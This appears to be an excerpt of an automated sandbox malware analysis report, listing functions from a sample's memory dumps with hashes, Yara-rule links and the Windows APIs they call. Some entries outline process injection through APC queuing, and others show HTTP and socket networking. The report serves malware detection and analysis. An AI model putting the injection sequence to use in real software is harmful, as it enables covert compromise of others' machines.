                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: f15f6ba7d61c77cb2f9ea827ba61a633b41e7ea38c6031940761d8a7b60c0ad9
                                                                  • Instruction ID: a661f6b3ec792a72dee66dbf4df720fcd635c4dae69d88dc7c4372438149d5ca
                                                                  • Opcode Fuzzy Hash: f15f6ba7d61c77cb2f9ea827ba61a633b41e7ea38c6031940761d8a7b60c0ad9
                                                                  • Instruction Fuzzy Hash: 4AD11773308A4292DF20DB6DD8902AFA765F7D5788F900016EF5E97A58EF39C946C780
                                                                  Function 009B8E97 Relevance: .1, Instructions: 134COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b70fd7dd056a9b0a37c440412f3a3cc8b7f7d80adc55c15e2758a15b9bb8beac
                                                                  • Instruction ID: 421300a38df063c68a65ba9eb2a1300f0f428f0da5e76fb4bf41f3a9721d3a84
                                                                  • Opcode Fuzzy Hash: b70fd7dd056a9b0a37c440412f3a3cc8b7f7d80adc55c15e2758a15b9bb8beac
                                                                  • Instruction Fuzzy Hash: 2F511BB6614A508BD714CB09E4D0B2BB7E1F3CCB94F84461AE39A87768DA3CD645DB40
                                                                  Function 009BE020 Relevance: .0, Instructions: 44COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ce50915e01d19d553e501072b1d9aa96a4661ac9f51e51d5d5a12a94cd83616d
                                                                  • Instruction ID: f39ceafa6f48f6d83c3e3849364aa727386b51efd6f9a38a824e052eaa85970e
                                                                  • Opcode Fuzzy Hash: ce50915e01d19d553e501072b1d9aa96a4661ac9f51e51d5d5a12a94cd83616d
                                                                  • Instruction Fuzzy Hash: 7B0136CBE5EED40AD72376640E7A1D82FADA4B6F3534D814ECB5053283F4CA5D055212
                                                                  Function 004092E4 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                                                  • Instruction ID: 040a81dcf2f050336bda00ad6163e1b97f4a0e7d9bd373c2026e90d71216a3c6
                                                                  • Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                                                  • Instruction Fuzzy Hash: 4DD0C7D7F5DFD096D32281A40CB60593F91B4F291031E80AF4E40A33D3741C1C055315
                                                                  Function 009BE628 Relevance: .0, Instructions: 13COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                                                  • Instruction ID: 0f26f9567e189b2c13289b42b0608cbdf9b2efb83227e6d68dd31f271b7da4a2
                                                                  • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                                                  • Instruction Fuzzy Hash: 8ED05ECBE1DBD486E36382684E2D2C92F6CA172A3074C408FC74006393E44A2801D311
                                                                  Function 009BE050 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                                                                  • Instruction ID: 122cdc85b36f9b2d01b635b9443545710c3fd5c81193500c444b5acb9b787d9b
                                                                  • Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                                                                  • Instruction Fuzzy Hash: 8EC04C57A189D04797126E1409A61D42B9AE5D2D3238E82998D5143D43514A5C17A311
                                                                  Function 009BE4E8 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                                                                  • Instruction ID: f0417758bf733833de28a2c53c38d17da1fcecface7511996c469d52c4a9ad68
                                                                  • Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                                                                  • Instruction Fuzzy Hash: 82C0129BE1DED44AE32341540D790ED3E9A90B2D2030D4146CF4802163A1450C005351
                                                                  Function 00402F69 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
                                                                  • Instruction ID: 82f505fb4451acb9e8d1e12f81e5a21f5fcc3540fe401e05c5c992db50528185
                                                                  • Opcode Fuzzy Hash: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
                                                                  • Instruction Fuzzy Hash: 62A0029244DD0290E3101B40D9413A07279D306240F0424A6421461072853D8520414C
                                                                  Function 009BE080 Relevance: .0, Instructions: 1COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fb8c4c6d7fc14fd894257e5a33dd5e098ea0c5a1cb046d3cc17427a3c123cd46
                                                                  • Instruction ID: 1fc194a69245e0f6854222b8023b07c3011217efdf892c475f715209dacd2de4
                                                                  • Opcode Fuzzy Hash: fb8c4c6d7fc14fd894257e5a33dd5e098ea0c5a1cb046d3cc17427a3c123cd46
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 009A5248 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: acceptioctlsocket$closesockethtonlselect
                                                                  • String ID:
                                                                  • API String ID: 2003300010-0
                                                                  • Opcode ID: c3319fb4cbf24cbfdae2e174894a45f5c1125c925141e30d007c99f121c1abae
                                                                  • Instruction ID: 03a76550cd21852c72f7377e6785589be9ed38a5d0c09a1ec000fefc2c4dcaa6
                                                                  • Opcode Fuzzy Hash: c3319fb4cbf24cbfdae2e174894a45f5c1125c925141e30d007c99f121c1abae
                                                                  • Instruction Fuzzy Hash: 96918D72710B91DADB20DF25E9807AD33A9F7887A8F404125EB5E47B58EF38C664CB40
                                                                  Function 009A9DE4 Relevance: 19.7, APIs: 13, Instructions: 238stringCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: strtok$malloc$_time64$ErrorFreeHeapLast_errno_getptdfree
                                                                  • String ID:
                                                                  • API String ID: 620445413-0
                                                                  • Opcode ID: f3941ba55fe43d2af69a1b800eaf21d8c24c130adf4bc5f8194ce19ef3ab75b1
                                                                  • Instruction ID: 62cf8f6522b447cdf9900a383900b1450d5c8e0717fa2fd7c8a49d1c3502b4d7
                                                                  • Opcode Fuzzy Hash: f3941ba55fe43d2af69a1b800eaf21d8c24c130adf4bc5f8194ce19ef3ab75b1
                                                                  • Instruction Fuzzy Hash: C1A11471245784DAEB14DF25F99032977A9F7467A8F10462BDA2A473B3CB3DC8A0C780
                                                                  Function 009A3B10 Relevance: 19.6, APIs: 13, Instructions: 105pipesleepfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$CountNamedPipeTick$Handle$CloseCreateDisconnectFileSleepStateWait
                                                                  • String ID:
                                                                  • API String ID: 832653698-0
                                                                  • Opcode ID: 0a85449faa1f51963aa2df0f1b09b7c9b8b21afb2d13fdae2c291ed2339458a4
                                                                  • Instruction ID: 37dfddd022a91b3fd471fc723392e40feccd3b51673309d2d3fc62e4ac2d8d9d
                                                                  • Opcode Fuzzy Hash: 0a85449faa1f51963aa2df0f1b09b7c9b8b21afb2d13fdae2c291ed2339458a4
                                                                  • Instruction Fuzzy Hash: 01415C36704B00C6EB04DF61F8587AD33A9E789BA4F108625EE6A47BA5DF38C9458780
                                                                  Function 0099E8D4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 130networksleepCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 0099E971
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                  • _snprintf.LIBCMT ref: 0099E98D
                                                                  • _snprintf.LIBCMT ref: 0099EA03
                                                                  • _snprintf.LIBCMT ref: 0099EA1A
                                                                    • Part of subcall function 009AB5DC: _flsbuf.LIBCMT ref: 009AB67D
                                                                  • HttpOpenRequestA.WININET ref: 0099EA66
                                                                  • HttpSendRequestA.WININET ref: 0099EA99
                                                                  • InternetCloseHandle.WININET ref: 0099EAAE
                                                                  • Sleep.KERNEL32 ref: 0099EAB9
                                                                  • InternetCloseHandle.WININET ref: 0099EACC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep_errno_flsbuf_invalid_parameter_noinfo
                                                                  • String ID: %s%s$*/*
                                                                  • API String ID: 3364845851-856325523
                                                                  • Opcode ID: 0694fbe2251f325486d7db104ce5f9bbd3e0ba48dceb4aa3373eff9f8ea386f1
                                                                  • Instruction ID: 095cd4892c31e8a9189a8875d1357c23dac360fedcdc57eaf9f26107f956ef72
                                                                  • Opcode Fuzzy Hash: 0694fbe2251f325486d7db104ce5f9bbd3e0ba48dceb4aa3373eff9f8ea386f1
                                                                  • Instruction Fuzzy Hash: 5A51CD36600B858AEB00DF65E8803DD77A4F7D97A8F500226EE4E53B66DF38C545CB40
                                                                  Function 009A233C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 113threadsleeplibraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32 ref: 009A23A6
                                                                  • GetProcAddress.KERNEL32 ref: 009A23B6
                                                                    • Part of subcall function 009A2258: malloc.LIBCMT ref: 009A2296
                                                                    • Part of subcall function 009A2258: VirtualAllocEx.KERNEL32 ref: 009A22E1
                                                                    • Part of subcall function 009A2258: WriteProcessMemory.KERNEL32 ref: 009A2305
                                                                    • Part of subcall function 009A2258: free.LIBCMT ref: 009A231B
                                                                  • OpenThread.KERNEL32 ref: 009A2420
                                                                  • CloseHandle.KERNEL32 ref: 009A2447
                                                                  • Thread32Next.KERNEL32 ref: 009A2454
                                                                  • CloseHandle.KERNEL32 ref: 009A2460
                                                                  • Sleep.KERNEL32 ref: 009A246B
                                                                  • ReadProcessMemory.KERNEL32 ref: 009A248C
                                                                  • WriteProcessMemory.KERNEL32 ref: 009A24BF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: HandleMemoryProcess$CloseWrite$AddressAllocModuleNextOpenProcReadSleepThreadThread32Virtualfreemalloc
                                                                  • String ID: NtQueueApcThread$ntdll
                                                                  • API String ID: 2809487561-1374908105
                                                                  • Opcode ID: 6afc254592d4cf48379ec8e8f43c23ff634562f8866ac748569cc3e6c81e8475
                                                                  • Instruction ID: 69d6f337646a3eace224820f1483ee15821b99c8c325985a409caeaab83a1836
                                                                  • Opcode Fuzzy Hash: 6afc254592d4cf48379ec8e8f43c23ff634562f8866ac748569cc3e6c81e8475
                                                                  • Instruction Fuzzy Hash: 02413532701B018AEB20CF66E9543AD33B9FB89B98F544525DE4D57B29EF38C545C780
                                                                  Function 009ABDB0 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009ABDD6
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009ABDE2
                                                                  • __crtIsPackagedApp.LIBCMT ref: 009ABDF3
                                                                  • AreFileApisANSI.KERNEL32 ref: 009ABE02
                                                                  • MultiByteToWideChar.KERNEL32 ref: 009ABE28
                                                                  • GetLastError.KERNEL32 ref: 009ABE35
                                                                  • _dosmaperr.LIBCMT ref: 009ABE3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 1138158220-0
                                                                  • Opcode ID: 3eec2c287576479eba86d9e5720364ab898d7a35fbd0fd2be876452c635e7a1b
                                                                  • Instruction ID: 04f0489a611dc50cc001d521f75bbcae1fb2ac10bf17fede61145108ad07ab23
                                                                  • Opcode Fuzzy Hash: 3eec2c287576479eba86d9e5720364ab898d7a35fbd0fd2be876452c635e7a1b
                                                                  • Instruction Fuzzy Hash: 5121B372305B0086EB20AF76E81536DB7E5FBC6FA4F144924DA4A47796DF7CC4008380
                                                                  Function 009ABF0C Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                  • String ID:
                                                                  • API String ID: 4099253644-0
                                                                  • Opcode ID: 35aca9194c528ae9650a35c73d1bdbf2d60b0283d2e9458ab8899a63ba071189
                                                                  • Instruction ID: 7bb847ef4b79f54dff66893912eaac2961d697402a1fc0694c4f877cb0f934ff
                                                                  • Opcode Fuzzy Hash: 35aca9194c528ae9650a35c73d1bdbf2d60b0283d2e9458ab8899a63ba071189
                                                                  • Instruction Fuzzy Hash: 23312F22389A0186FF15EB91ED613786769FB96BA8F4C0226D91907273EF3CC840C790
                                                                  Function 009A5970 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                                                  • String ID: d
                                                                  • API String ID: 1257931466-2564639436
                                                                  • Opcode ID: 88a0dad43e10c1c2d02976864a9ec383be54b38174a8cea9b784459703743c46
                                                                  • Instruction ID: cfafed489a822544a77eceaa7f39cc6a4761cc453b6227d2fff0dd76b3a1979f
                                                                  • Opcode Fuzzy Hash: 88a0dad43e10c1c2d02976864a9ec383be54b38174a8cea9b784459703743c46
                                                                  • Instruction Fuzzy Hash: 7C316C32325B85D6DB61CF21E9843DA73A8F788B98F015126EE8E47B28DF78C555CB40
                                                                  Function 03562003 Relevance: 16.6, APIs: 11, Instructions: 108COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 03562035
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 0356202C
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  • __doserrno.LIBCMT ref: 03562092
                                                                  • _errno.LIBCMT ref: 03562099
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 035620FD
                                                                  Memory Dump Source
